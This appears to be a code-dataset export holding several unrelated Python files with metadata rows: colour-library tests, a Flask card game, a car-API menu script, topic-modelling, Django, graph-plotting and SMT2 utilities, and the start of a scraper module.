b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | null | null | null |
import pytest
from colorviews import AlphaColor
class TestGetAttr:
    """Attribute reads on the hsva view of an AlphaColor."""

    @pytest.mark.parametrize("attr, expected", [
        ("h", 0.75),
        ("s", 0.47),
        ("v", 0.29),
        ("a", 0.79),
    ])
    def test_valid(self, attr, expected):
        # Each HSVA component reads back (to 4 decimal places) as constructed.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        assert round(getattr(color.hsva, attr), 4) == expected

    @pytest.mark.parametrize("attr", [
        "r", "b",
    ])
    def test_invalid(self, attr):
        # RGB component names are not attributes of the hsva view.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        with pytest.raises(AttributeError):
            getattr(color.hsva, attr)
class TestSetAttr:
    """Attribute writes on the hsva view of an AlphaColor."""

    @pytest.mark.parametrize("attr, val", [
        ("h", 0.75),
        ("s", 0.5),
        ("v", 0.29),
        ("a", 0.49),
    ])
    def test_valid(self, attr, val):
        # Setting a component stores the value (read back to 4 decimal places).
        color = AlphaColor.from_hsva(0.45, 0.15, 0.89, 0.79)
        setattr(color.hsva, attr, val)
        assert round(getattr(color.hsva, attr), 4) == val

    @pytest.mark.parametrize("attr", [
        "r", "g",
    ])
    def test_invalid(self, attr):
        # RGB component names cannot be assigned through the hsva view.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        with pytest.raises(AttributeError):
            setattr(color.hsva, attr, 0.1)
@pytest.mark.parametrize("hsva_dict, expected", [
    ({"h": 91 / 360}, 0x394a2980),
    ({"s": 0.15}, 0x443f4a80),
    ({"v": 0.74}, 0x9268bd80),
    ({"a": 0.80}, 0x39294acc),
    ({"h": 91 / 360, "s": 0.15}, 0x444a3f80),
    ({"h": 91 / 360, "v": 0.74}, 0x91bd6880),
    ({"h": 91 / 360, "v": 0.74, "a": 0.25}, 0x91bd6840),
    ({"s": 0.15, "v": 0.74}, 0xafa0bd80),
    ({"h": 91 / 360, "s": 0.15, "v": 0.74}, 0xaebda080),
])
def test_replace(hsva_dict, expected):
    # replace() swaps in the given components and the result converts to the
    # expected 0xRRGGBBAA integer.
    # NOTE(review): defined without `self`; if this was meant to sit inside a
    # test class it is missing the `self` parameter — confirm placement.
    color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.5)
    assert int(color.hsva.replace(**hsva_dict)) == expected
class TestVals:
    """Bulk assignment through the hsva view's `vals` property."""

    @pytest.mark.parametrize("vals", [
        [0.2, 0.4, 0.6, 0.1],
        (0.6, 0.2, 0.4, 0.54),
    ])
    def test_setter_valid(self, vals):
        # A 4-element list or tuple assigns all components at once.
        color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
        color.hsva.vals = vals
        assert [round(val, 4) for val in color.hsva] == list(vals)

    @pytest.mark.parametrize("wrong_vals", [
        [0.2, 0.4],
        (1.6, 0.2, 0.4),
        (0.6, 0.2, 0.4, 1.0, 0.8),
    ])
    def test_setter_invalid(self, wrong_vals):
        # Wrong length or out-of-range values must be rejected.
        color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
        with pytest.raises(ValueError):
            color.hsva.vals = wrong_vals
def test_vals_getter():
    """hsva.vals round-trips the components passed to AlphaColor.from_hsva."""
    expected = (0.75, 0.45, 0.29, 0.79)
    color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
    rounded = [round(component, 4) for component in color.hsva.vals]
    assert rounded == list(expected)
| 29.920455
| 67
| 0.545765
| 399
| 2,633
| 3.538847
| 0.190476
| 0.021246
| 0.107649
| 0.130312
| 0.540368
| 0.431303
| 0.386686
| 0.320113
| 0.308782
| 0.251416
| 0
| 0.146565
| 0.253703
| 2,633
| 87
| 68
| 30.264368
| 0.57201
| 0
| 0
| 0.315068
| 0
| 0
| 0.034941
| 0
| 0
| 0
| 0.034182
| 0
| 0.068493
| 1
| 0.109589
| false
| 0
| 0.027397
| 0
| 0.178082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92170ef42c7d1d4c09bcc11c88becf053c48250
| 2,645
|
py
|
Python
|
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
import random, logging
from collections import Counter
from flask import Flask, session, request, render_template, jsonify
from app.util import unflatten
from app.fiftycents import FiftyCentsGame
from app.fiftycents import Card
# Silence werkzeug's per-request access log; only errors are shown.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

app = Flask(__name__)
# NOTE(review): hard-coded session secret — acceptable for a local toy app only.
app.secret_key = 'peanut'

# One global game instance shared by every request (single-player app).
game = FiftyCentsGame(2)
@app.route("/", methods=['POST', 'GET'])
def index():
    """Render the main game page; a POST first applies the submitted play."""
    if request.method == "POST":
        # Flattened form keys (e.g. "play[K]") are expanded into a nested dict.
        data = unflatten(request.form.to_dict())
        for k,v in data["play"].items():
            data["play"][k] = int(v)  # form values arrive as strings
        game.play(data)
    # The hand is rendered as a rank -> count mapping covering every rank,
    # so absent ranks show as 0.
    player = {"hand": {k: 0 for k in Card.RANKS},
              "coins": game.player.coins,
              "points": game.player.total_score}
    for k, v in dict(Counter([c.rank for c in game.player.hand])).items():
        player["hand"][k] = v
    # Current round goal: how many sets of what size.
    goal = {"set_num": game.current_round[0],
            "set_size": game.current_round[1]}
    pile = [c.rank for c in game.open_deck.cards]
    return render_template('main.html',
                           player=player,
                           pile=pile,
                           goal=goal,
                           playable = sorted([c for c in game.cards_in_play if c not in ["2", "JOKER"]]),
                           player_has_drawn=game.player_has_drawn,
                           game_over = game.game_over,
                           player_score = game.player.get_current_score(),
                           ai_score = game.AI.get_current_score(),
                           ai_total = game.AI.total_score)
@app.route("/info/", methods=['GET'])
def info():
    """Return a JSON snapshot of player, computer and game state (debug endpoint)."""
    def ranks(cards):
        # Project a sequence of Card objects onto their rank strings.
        return [c.rank for c in cards]

    player_state = {
        "hand": ranks(game.player.hand),
        "played": ranks(game.player.played_cards),
        "coins": game.player.coins,
        "score": game.player.get_current_score()
    }
    computer_state = {
        "hand": ranks(game.AI.hand),
        "played": ranks(game.AI.played_cards),
        "coins": game.AI.coins,
        "score": game.AI.get_current_score()
    }
    game_state = {
        "open": ranks(game.open_deck.cards),
        "cards_in_play": list(game.cards_in_play),
        "round": game.current_round
    }
    return jsonify({"player": player_state,
                    "computer": computer_state,
                    "game": game_state})
| 38.897059
| 107
| 0.483554
| 292
| 2,645
| 4.236301
| 0.287671
| 0.072757
| 0.038804
| 0.064673
| 0.240097
| 0.240097
| 0.149555
| 0.122878
| 0.045271
| 0
| 0
| 0.003141
| 0.39811
| 2,645
| 67
| 108
| 39.477612
| 0.773869
| 0
| 0
| 0.035714
| 0
| 0
| 0.066718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.107143
| 0.017857
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c921d773c35312ecebe3d4b6eaaaef9e999e9c07
| 4,905
|
py
|
Python
|
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
import time
import logging
import pickle
import json
import consolemenu
from generic_lib import georeverse, geolookup
from bluvo_main import BlueLink
from tools.stamps import postOffice
from params import * # p_parameters are read
# Log everything (DEBUG and up) from every module to bluvo_test.log.
logging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(filename)-18s - %(message)s', filename='bluvo_test.log',
                    level=logging.DEBUG)

# Interactive menu entries; the numeric prefix matches the option number
# handled in the dispatch loop below.
menuoptions = ['0 exit',"1 Lock", "2 Unlock", "3 Status", "4 Status formatted", "5 Status refresh", "6 location", "7 loop status",
               "8 Navigate to", '9 set Charge Limits', '10 get charge schedule', '11 get services', '12 poll car', '13 get stamps', '14 odometer', '15 get park location',
               '16 get user info', '17 get monthly report', '18 get monthly report lists']
mymenu = consolemenu.SelectionMenu(menuoptions)

# heartbeatinterval, initsuccess = initialise(p_email, p_password, p_pin, p_vin, p_abrp_token, p_abrp_carmodel, p_WeatherApiKey,
#                                             p_WeatherProvider, p_homelocation, p_forcepollinterval, p_charginginterval,
#                                             p_heartbeatinterval)

# Connect to the BlueLink/UVO API using the p_* credentials from params.py.
bluelink = BlueLink(p_email, p_password, p_pin, p_vin, p_abrp_carmodel, p_abrp_token, p_WeatherApiKey, p_WeatherProvider, p_homelocation)
bluelink.initialise(p_forcepollinterval, p_charginginterval)
if bluelink.initSuccess:
#stampie = postOffice("hyundai", False)
while True:
for i in menuoptions:
print(i)
#try:
x = int(input("Please Select:"))
print(x)
if x == 0: exit()
if x == 1: bluelink.vehicle.api_set_lock('on')
if x == 2: bluelink.vehicle.api_set_lock('off')
if x == 3: print(bluelink.vehicle.api_get_status(False))
if x == 4:
status_record = bluelink.vehicle.api_get_status(False, False)
for thing in status_record:
print(thing + ": " + str(status_record[thing]))
if x == 5: print(bluelink.vehicle.api_get_status(True))
if x == 6:
locatie = bluelink.vehicle.api_get_location()
if locatie:
locatie = locatie['gpsDetail']['coord']
print(georeverse(locatie['lat'], locatie['lon']))
if x == 7:
while True:
# read semaphore flag
try:
with open('semaphore.pkl', 'rb') as f:
manualForcePoll = pickle.load(f)
except:
manualForcePoll = False
print(manualForcePoll)
updated, parsedStatus, afstand, googlelocation = bluelink.pollcar(manualForcePoll)
# clear semaphore flag
manualForcePoll = False
with open('semaphore.pkl', 'wb') as f:
pickle.dump(manualForcePoll, f)
if updated:
print('afstand van huis, rijrichting, snelheid en km-stand: ', afstand, ' / ',
parsedStatus['heading'], '/', parsedStatus['speed'], '/', parsedStatus['odometer'])
print(googlelocation)
print("range ", parsedStatus['range'], "soc: ", parsedStatus['chargeHV'])
if parsedStatus['charging']: print("Laden")
if parsedStatus['trunkopen']: print("kofferbak open")
if not (parsedStatus['locked']): print("deuren van slot")
if parsedStatus['dooropenFL']: print("bestuurdersportier open")
print("soc12v ", parsedStatus['charge12V'], "status 12V", parsedStatus['status12V'])
print("=============")
time.sleep(bluelink.heartbeatinterval)
if x == 8: print(bluelink.vehicle.api_set_navigation(geolookup(input("Press Enter address to navigate to..."))))
if x == 9:
invoer = input("Enter maximum for fast and slow charging (space or comma or semicolon or colon seperated)")
for delim in ',;:': invoer = invoer.replace(delim, ' ')
print(bluelink.vehicle.api_set_chargelimits(invoer.split()[0], invoer.split()[1]))
if x == 10: print(json.dumps(bluelink.vehicle.api_get_chargeschedule(),indent=4))
if x == 11: print(bluelink.vehicle.api_get_services())
if x == 12: print(str(bluelink.pollcar(True)))
if x == 13:
print( "feature removed")
if x == 14: print(bluelink.vehicle.api_get_odometer())
if x == 15: print(bluelink.vehicle.api_get_parklocation())
if x == 16: print(bluelink.vehicle.api_get_userinfo())
if x == 17: print(bluelink.vehicle.api_get_monthlyreport(2021,5))
if x == 18: print(bluelink.vehicle.api_get_monthlyreportlist())
input("Press Enter to continue...")
# except (ValueError) as err:
# print("error in menu keuze")
else:
logging.error("initialisation failed")
| 50.56701
| 171
| 0.601019
| 551
| 4,905
| 5.23412
| 0.37931
| 0.019764
| 0.09362
| 0.080097
| 0.173717
| 0.084258
| 0.019417
| 0.019417
| 0.019417
| 0.019417
| 0
| 0.02118
| 0.278084
| 4,905
| 96
| 172
| 51.09375
| 0.793279
| 0.078491
| 0
| 0.050633
| 0
| 0
| 0.188776
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.012658
| 0.113924
| 0
| 0.113924
| 0.341772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92214401251c6b4745f3ba05c668f2913227e7f
| 2,962
|
py
|
Python
|
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | null | null | null |
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | null | null | null |
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | 1
|
2019-05-28T21:49:45.000Z
|
2019-05-28T21:49:45.000Z
|
#!/usr/bin/env python3
"""
Author : kai
Date : 2019-06-26
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
import csv
# --------------------------------------------------
def get_args():
    """Parse and return the command-line arguments."""
    parser = argparse.ArgumentParser(
        description='Argparse Python script',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-a', '--arg', metavar='str', type=str, default='',
                        help='A named string argument')
    parser.add_argument('-i', '--int', metavar='int', type=int, default=0,
                        help='A named integer argument')
    parser.add_argument('-f', '--flag', action='store_true',
                        help='A boolean flag')
    return parser.parse_args()
# --------------------------------------------------
def warn(msg):
    """Write *msg* (plus a newline) to STDERR."""
    sys.stderr.write(str(msg) + "\n")
# --------------------------------------------------
def die(msg='Something bad happened'):
    """warn() and exit with error (status code 1)."""
    warn(msg)
    sys.exit(1)
# --------------------------------------------------
def main():
    """Make a jazz noise here.

    Joins the LDA topic dump (`model_topics.txt`) against the InterPro entry
    list and writes a tab-separated `output_topics.tsv` with one row per
    (topic, coefficient, InterPro id, entry name).
    """
    args = get_args()
    str_arg = args.arg
    int_arg = args.int
    flag_arg = args.flag
    #pos_arg = args.positional
    # Read the annotations file: maps entry accession -> human-readable name.
    intpro_dict = {}
    with open('InterPro_entry_list.tsv') as csvfile:
        reader = csv.DictReader(csvfile, delimiter='\t')
        for row in reader:
            intpro_dict[row['ENTRY_AC']] = row['ENTRY_NAME']
    # Flatten the topic dump and strip list/quote punctuation so each
    # "(topic, ...)" chunk can be split apart textually.
    with open('model_topics.txt', 'r') as file:
        model_topics = file.read().replace('\n', '')
    model_topics = re.sub("'", "", model_topics)
    model_topics = re.sub(r"\[", "", model_topics)
    model_topics = re.sub(r"\]", "", model_topics)
    mtl = model_topics.split('), ')
    id_re = re.compile(r'IPR\d{3}')  # hoisted: compile once, not per chunk
    with open('output_topics.tsv', 'w') as f:
        print('Topic\tModel_coefficient\tInterpro_ID\tInterPro_ENTRY_NAME', file=f)
        for chunk in mtl:  # renamed from `list`: don't shadow the builtin
            topic = chunk[1]  # topic number is the 2nd char, e.g. "(3, ..."
            split_list = chunk.split()
            c_words = [w for w in split_list if id_re.search(w)]
            c_words = [re.sub('"', '', i) for i in c_words]
            for w in c_words:
                # Bug fix: the original computed re.sub(r'\)', '', w) and
                # discarded the result; keep the cleaned value.  Output is
                # unchanged because intpro[:9] already trimmed the ')'.
                w = re.sub(r'\)', '', w)
                coef, intpro = w.split('*')
                intpro = intpro[:9]  # IPR accessions are 9 chars (IPR+6 digits)
                label = intpro_dict.get(intpro, '')
                print('{}\t{}\t{}\t{}'.format(topic, coef, intpro, label), file=f)


# --------------------------------------------------
if __name__ == '__main__':
    main()
| 26.684685
| 83
| 0.497637
| 329
| 2,962
| 4.322188
| 0.398176
| 0.06962
| 0.04782
| 0.033755
| 0.07384
| 0.056962
| 0.056962
| 0.056962
| 0.056962
| 0.056962
| 0
| 0.006588
| 0.282579
| 2,962
| 110
| 84
| 26.927273
| 0.662588
| 0.195814
| 0
| 0.043478
| 0
| 0
| 0.13774
| 0.034542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.130435
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c924841b1d689ef522dd4926df95b7101d1bb341
| 292
|
py
|
Python
|
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
from django.urls import path

from users import views

app_name = 'users'

# User-management endpoints: registration, auth-token issue, own profile.
urlpatterns = [
    path('create/', views.CreateUserView.as_view(), name='create'),
    path('token/', views.CreateTokenView.as_view(), name='token'),
    path('me/', views.ManageUserView.as_view(), name='me'),
]
| 26.545455
| 66
| 0.674658
| 37
| 292
| 5.216216
| 0.486486
| 0.093264
| 0.15544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14726
| 292
| 11
| 67
| 26.545455
| 0.7751
| 0
| 0
| 0
| 0
| 0
| 0.120141
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92510f03e8c86ab8acb7443fa38d2785d4a3bca
| 4,200
|
py
|
Python
|
archive/visualization/network.py
|
ajrichards/bayesian-examples
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | 2
|
2016-01-27T08:51:23.000Z
|
2017-04-17T02:21:34.000Z
|
archive/visualization/network.py
|
ajrichards/notebook
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | null | null | null |
archive/visualization/network.py
|
ajrichards/notebook
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
def get_a_dict(filepath):
    """Load the transition CSV and return the rows for five themes of interest.

    Each theme maps to a two-element list: the even-position columns and the
    odd-position columns of that row (after dropping the first CSV column).
    """
    frame = pd.read_csv(filepath).iloc[:, 1:13]
    theme_rows = [3, 6, 11, 15, 16]
    theme_labels = ['Horrendous IVR', 'Mobile Disengagement', "Couldn't Find it Online", "Mobile Users", "Just Show Me the Summary"]
    themes = {}
    for label, row_idx in zip(theme_labels, theme_rows):
        themes[label] = [frame.iloc[row_idx, ::2], frame.iloc[row_idx, 1::2]]
    return themes
def draw_graph(edgeWeights,plotName='network_graph.png'):
    """
    INPUT: this function takes in a dictionary of each edge names and the weight corresponding to that edge name

    Draws a bipartite theme/event network, colours edges by weight, dashes the
    zero-weight ("insignificant") edges, adds a colorbar and a text legend,
    and saves the figure to `plotName`.
    """
    edgeDict = {"t1e1":("T1","E1"), "t1e2":("T1","E2"), "t1e6":("T1","E6"), "t2e4":("T2","E4"), "t2e5":("T2","E5"), "t2e6":("T2","E6"), "t3e3":("T3","E3"), "t3e4":("T3","E4"), "t3e5":("T3","E5")}
    ## initialize the graph
    G = nx.Graph()
    for node in ["T1","T2","T3","E1","E2","E3","E4", "E5", "E6"]:
        G.add_node(node)
    # Bug fix: dict.iteritems() is Python 2 only and crashes on Python 3
    # (which this file otherwise targets); items() works on both.
    for edgeName, edge in edgeDict.items():
        G.add_edge(edge[0], edge[1], weight=edgeWeights[edgeName])
    # explicitly set positions
    pos={"T1":(2,2),
         "T2":(3.5,2),
         "T3":(5,2),
         "E1":(1,1),
         "E2":(2,1),
         "E3":(3,1),
         "E4":(4,1),
         "E5": (5, 1),
         "E6": (6, 1)}
    ## get insignificant edges
    isEdges = [(u,v) for (u,v,d) in G.edges(data=True) if d['weight'] ==0.0]
    # plot the network
    nodeSize = 2000
    # Bug fix: Graph.edges_iter() was removed in networkx 2.0; edges(data=True)
    # is equivalent and iterable on both 1.x and 2.x+.
    colors = [edge[2]['weight'] for edge in G.edges(data=True)]
    cmap = plt.cm.winter
    fig = plt.figure(figsize=(12,6))
    fig.suptitle('Word Theme Probabilities', fontsize=14, fontweight='bold')
    ax = fig.add_axes([0.355, 0.0, 0.7, 1.0])
    nx.draw(G,pos,node_size=nodeSize,edge_color=colors,width=4,edge_cmap=cmap,edge_vmin=-0.5,edge_vmax=0.5,ax=ax, with_labels=True)
    # Bug fix: draw_networkx_nodes() does not take with_labels (labels are
    # drawn by nx.draw above); the stray kwarg raises on modern networkx.
    nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["T1","T2","T3"],node_color='#F2F2F2')
    nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["E1","E2","E3","E4", "E5", "E6"],node_color='#0066FF')
    nx.draw_networkx_edges(G,pos,edgelist=isEdges,width=1,edge_color='k',style='dashed')
    ## add a colormap
    ax1 = fig.add_axes([0.03, 0.05, 0.35, 0.14])
    norm = mpl.colors.Normalize(vmin=0.05, vmax=.2)
    cb1 = mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
                                    norm=norm,
                                    orientation='horizontal')
    # add an axis for the legend
    ax2 = fig.add_axes([0.03,0.25,0.35,0.65]) # l,b,w,h
    ax2.set_yticks([])
    ax2.set_xticks([])
    ax2.set_frame_on(True)
    fontSize = 10
    ax2.text(0.1,0.9,r"$T1$ = Horrendous IVR" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.8,r"$T2$ = Mobile Disengagement" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.7,r"$T3$ = Mobile Users" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.6,r"$E1$ = agent.transfer->ivr.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.5,r"$E2$ = agent.assigned->call.transfer" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.4,r"$E3$ = sureswip.login->view.account.summary" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.3,r"$E4$ = mobile.exit->mobile.entry" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.2,r"$E5$ = mobile.exit->journey.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
    ax2.text(0.1,0.1,r"$E6$ = ivr.entry->ivr.proactive.balance" ,color='k',fontsize=fontSize,ha="left", va="center")
    plt.savefig(plotName)
if __name__ == "__main__":
    # Demo run: load the transition data, peek at one theme, then draw the
    # network with a hand-tuned set of edge weights.
    filepath = '../word_transition_model/data/transitions_df.csv'
    data_dict = get_a_dict(filepath)
    summary = data_dict['Just Show Me the Summary']
    summary_events = summary[0]  # even-position columns of the theme row
    summary_scores = summary[1]  # odd-position columns of the theme row
    # NOTE(review): summary_* are computed but never used — draw_graph gets
    # the hard-coded weights below instead; confirm this is intentional.
    edge_weights = {"t1e1":0.14, "t1e2":0.13, "t1e6":0.12, "t2e4":0.05, "t2e5":0.16, "t2e6":0.0, "t3e3":0.3, "t3e4":0.1, "t3e5":0.04}
    draw_graph(edge_weights)
| 44.680851
| 196
| 0.61381
| 680
| 4,200
| 3.694118
| 0.305882
| 0.008758
| 0.028662
| 0.032245
| 0.272293
| 0.244427
| 0.21258
| 0.21258
| 0.198248
| 0.198248
| 0
| 0.077967
| 0.175476
| 4,200
| 93
| 197
| 45.16129
| 0.647416
| 0.058571
| 0
| 0
| 0
| 0
| 0.204123
| 0.055739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.057971
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92dbb28d5fa5849ee22ef3b509bd866ce701e9e
| 1,508
|
py
|
Python
|
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
#!/home/rakeshmistry/bin/Python-3.4.3/bin/python3
# @author: rakesh mistry - 'inspire'
# @date: 2015-08-06
import sys
import re
import os
import math
# Function: parseSmt2FileVariables
def parseSmt2FileVariables(smt2File):
    """Scan an SMT2 file (or any iterable of lines) for variable declarations.

    Returns a dict mapping each declared variable name to its bit width;
    declarations whose final token is not a plain integer (e.g. Bool) are
    skipped.
    """
    compiledVarPattern = re.compile(r"[ \t]*\(declare-fun")
    varMap = {}
    for line in smt2File:
        if compiledVarPattern.search(line):
            wordList = line.split()
            varName = wordList[1]
            # The width is the last token, e.g. "8))" in "(_ BitVec 8))".
            varWidthStr = wordList[-1].rstrip(")")
            if varWidthStr.isdigit():
                varMap[varName] = int(varWidthStr)
    return varMap


# Function: main
def main(argv):
    """Summarise the variable widths of an SMT2 file into an output file.

    Writes "maxBitwidth;numVars;multiBitVars;singleBitVars" to argv[2].
    """
    # check for correct number of arguments
    scriptName = os.path.basename(__file__)
    if len(argv) < 3:
        sys.stderr.write("Error: Invalid arguments.\n")
        sys.stderr.write(" [Usage]: " + scriptName + " <input_SMT2_file> <output_file>\n")
        sys.exit(1)
    # Bug fix: the input file handle was opened and never closed (and the
    # output relied on a manual close); context managers release both even
    # on error.
    with open(argv[1], "r") as inputSMTFile:
        varMap = parseSmt2FileVariables(inputSMTFile)
    maxBitwidth = max(varMap.values())  # raises ValueError if no declarations
    singleBitVars = 0
    multiBitVars = 0
    for key in varMap.keys():
        if varMap[key] > 1:
            multiBitVars += 1
        else:
            singleBitVars += 1
    with open(argv[2], "w") as finalOutputFile:
        finalOutputFile.write(str(maxBitwidth) + ";" + str(len(varMap)) + ";" + str(multiBitVars) + ";" + str(singleBitVars))


if __name__ == "__main__":
    main(sys.argv)
| 25.133333
| 121
| 0.611406
| 163
| 1,508
| 5.564417
| 0.533742
| 0.019846
| 0.030871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025847
| 0.255968
| 1,508
| 59
| 122
| 25.559322
| 0.782531
| 0.125332
| 0
| 0
| 0
| 0
| 0.081555
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.108108
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92faeda80f7623d46a23810d5c128754efcada2
| 9,880
|
py
|
Python
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 7
|
2019-08-11T10:31:03.000Z
|
2021-03-08T10:07:52.000Z
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 1
|
2020-12-29T02:30:18.000Z
|
2021-01-25T02:49:37.000Z
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 4
|
2019-10-22T02:14:35.000Z
|
2021-05-13T07:01:56.000Z
|
#!/usr/bin/python
#coding=utf-8
import json, re, logging, time, io, os
import sys
from simplified_scrapy.core.config_helper import Configs
from simplified_scrapy.core.sqlite_cookiestore import SqliteCookieStore
from simplified_scrapy.core.request_helper import requestPost, requestGet, getResponseStr, extractHtml
from simplified_scrapy.core.utils import convertTime2Str, convertStr2Time, printInfo, absoluteUrl
from simplified_scrapy.core.regex_helper import *
